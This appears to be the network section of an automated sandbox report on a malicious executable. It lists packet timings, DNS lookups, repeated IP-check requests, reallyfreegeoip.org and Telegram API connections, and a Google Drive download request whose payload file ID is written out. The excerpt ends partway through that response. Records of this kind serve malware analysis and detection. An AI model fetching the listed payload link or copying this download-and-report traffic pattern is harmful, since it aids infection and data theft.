                                                                                                        Jan 11, 2025 07:20:37.707197905 CET49721443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:37.707222939 CET44349721149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:37.707279921 CET49721443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:37.707288027 CET44349721149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:37.992424965 CET44349721149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:37.992631912 CET44349721149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:37.992702961 CET49721443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:37.992979050 CET49721443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:37.996040106 CET4972080192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:37.996603966 CET4972280192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:38.001643896 CET8049720132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:38.001692057 CET8049722132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:38.001710892 CET4972080192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:38.001766920 CET4972280192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:38.001841068 CET4972280192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:38.006678104 CET8049722132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:38.674196959 CET8049722132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:38.675430059 CET49723443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:38.675489902 CET44349723149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:38.675558090 CET49723443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:38.675792933 CET49723443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:38.675815105 CET44349723149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:38.721518993 CET4972280192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:39.292253971 CET44349723149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:39.293708086 CET49723443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:39.293749094 CET44349723149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:39.293808937 CET49723443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:39.293818951 CET44349723149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:39.599975109 CET44349723149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:39.600044966 CET44349723149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:39.600110054 CET49723443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:39.600521088 CET49723443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:39.603507996 CET4972280192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:39.604110003 CET4972480192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:39.608519077 CET8049722132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:39.608588934 CET4972280192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:39.608939886 CET8049724132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:39.608998060 CET4972480192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:39.609081030 CET4972480192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:39.613905907 CET8049724132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:40.295941114 CET8049724132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:40.297725916 CET49725443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:40.297784090 CET44349725149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:40.297940969 CET49725443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:40.298413038 CET49725443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:40.298427105 CET44349725149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:40.346481085 CET4972480192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:40.940259933 CET44349725149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:40.941936016 CET49725443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:40.941958904 CET44349725149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:40.941998005 CET49725443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:40.942006111 CET44349725149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:41.250464916 CET44349725149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:41.250552893 CET44349725149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:41.250713110 CET49725443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:41.251342058 CET49725443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:41.254499912 CET4972480192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:41.255822897 CET4972680192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:41.259442091 CET8049724132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:41.259505033 CET4972480192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:41.260596991 CET8049726132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:41.260663986 CET4972680192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:41.260770082 CET4972680192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:41.265547037 CET8049726132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:41.940922976 CET8049726132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:41.987143993 CET4972680192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:44.422343969 CET49727443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:44.422415018 CET44349727149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:44.422472954 CET49727443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:44.422718048 CET49727443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:44.422734022 CET44349727149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:45.050636053 CET44349727149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:45.052237988 CET49727443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:45.052263975 CET44349727149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:45.052323103 CET49727443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:45.052328110 CET44349727149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:45.361064911 CET44349727149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:45.361157894 CET44349727149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:45.361216068 CET49727443192.168.2.9149.154.167.220
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 11, 2025 07:20:00.630072117 CET5963053192.168.2.91.1.1.1
                                                                                                        Jan 11, 2025 07:20:00.637142897 CET53596301.1.1.1192.168.2.9
                                                                                                        Jan 11, 2025 07:20:01.732357025 CET6105453192.168.2.91.1.1.1
                                                                                                        Jan 11, 2025 07:20:01.739254951 CET53610541.1.1.1192.168.2.9
                                                                                                        Jan 11, 2025 07:20:05.204962015 CET5445253192.168.2.91.1.1.1
                                                                                                        Jan 11, 2025 07:20:05.211642981 CET53544521.1.1.1192.168.2.9
                                                                                                        Jan 11, 2025 07:20:15.859863043 CET5171753192.168.2.91.1.1.1
                                                                                                        Jan 11, 2025 07:20:15.867202044 CET53517171.1.1.1192.168.2.9
                                                                                                        Jan 11, 2025 07:20:27.699206114 CET5819853192.168.2.91.1.1.1
                                                                                                        Jan 11, 2025 07:20:27.705984116 CET53581981.1.1.1192.168.2.9
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Jan 11, 2025 07:20:00.630072117 CET192.168.2.91.1.1.10xe83dStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:01.732357025 CET192.168.2.91.1.1.10x662dStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:05.204962015 CET192.168.2.91.1.1.10xca82Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:15.859863043 CET192.168.2.91.1.1.10x10ecStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:27.699206114 CET192.168.2.91.1.1.10xd51dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Jan 11, 2025 07:20:00.637142897 CET1.1.1.1192.168.2.90xe83dNo error (0)drive.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:01.739254951 CET1.1.1.1192.168.2.90x662dNo error (0)drive.usercontent.google.com216.58.206.65A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:05.211642981 CET1.1.1.1192.168.2.90xca82No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:05.211642981 CET1.1.1.1192.168.2.90xca82No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:05.211642981 CET1.1.1.1192.168.2.90xca82No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:05.211642981 CET1.1.1.1192.168.2.90xca82No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:05.211642981 CET1.1.1.1192.168.2.90xca82No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:05.211642981 CET1.1.1.1192.168.2.90xca82No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:15.867202044 CET1.1.1.1192.168.2.90x10ecNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:15.867202044 CET1.1.1.1192.168.2.90x10ecNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:15.867202044 CET1.1.1.1192.168.2.90x10ecNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:15.867202044 CET1.1.1.1192.168.2.90x10ecNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:15.867202044 CET1.1.1.1192.168.2.90x10ecNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:15.867202044 CET1.1.1.1192.168.2.90x10ecNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:15.867202044 CET1.1.1.1192.168.2.90x10ecNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:20:27.705984116 CET1.1.1.1192.168.2.90xd51dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                        • drive.google.com
                                                                                                        • drive.usercontent.google.com
                                                                                                        • reallyfreegeoip.org
                                                                                                        • api.telegram.org
                                                                                                        • checkip.dyndns.org
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.949711132.226.247.73808088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:20:05.220906019 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 11, 2025 07:20:13.844959021 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:20:13 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                        Jan 11, 2025 07:20:13.853431940 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Jan 11, 2025 07:20:15.587677002 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:20:15 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                        Jan 11, 2025 07:20:21.929239988 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Jan 11, 2025 07:20:25.141398907 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                        Date: Sat, 11 Jan 2025 06:20:25 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 557
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                        Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                        Jan 11, 2025 07:20:25.479232073 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Jan 11, 2025 07:20:27.692233086 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:20:27 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.949714132.226.247.73808088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:20:28.699321032 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Jan 11, 2025 07:20:31.370702028 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:20:31 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.949716132.226.247.73808088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:20:32.362955093 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Jan 11, 2025 07:20:33.056241989 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:20:32 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.949718132.226.247.73808088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:20:33.917927027 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 11, 2025 07:20:35.587040901 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:20:35 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.949720132.226.247.73808088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:20:36.407249928 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 11, 2025 07:20:37.080285072 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:20:36 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.949722132.226.247.73808088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:20:38.001841068 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 11, 2025 07:20:38.674196959 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:20:38 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.949724132.226.247.73808088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:20:39.609081030 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 11, 2025 07:20:40.295941114 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:20:40 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.949726132.226.247.73808088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:20:41.260770082 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 11, 2025 07:20:41.940922976 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:20:41 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.949709142.250.185.1424438088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:20:01 UTC216OUTGET /uc?export=download&id=1H9-NX9FTfhx7ES6nhfZpdxVzAkPSYSRn HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                        Host: drive.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2025-01-11 06:20:01 UTC1920INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Sat, 11 Jan 2025 06:20:01 GMT
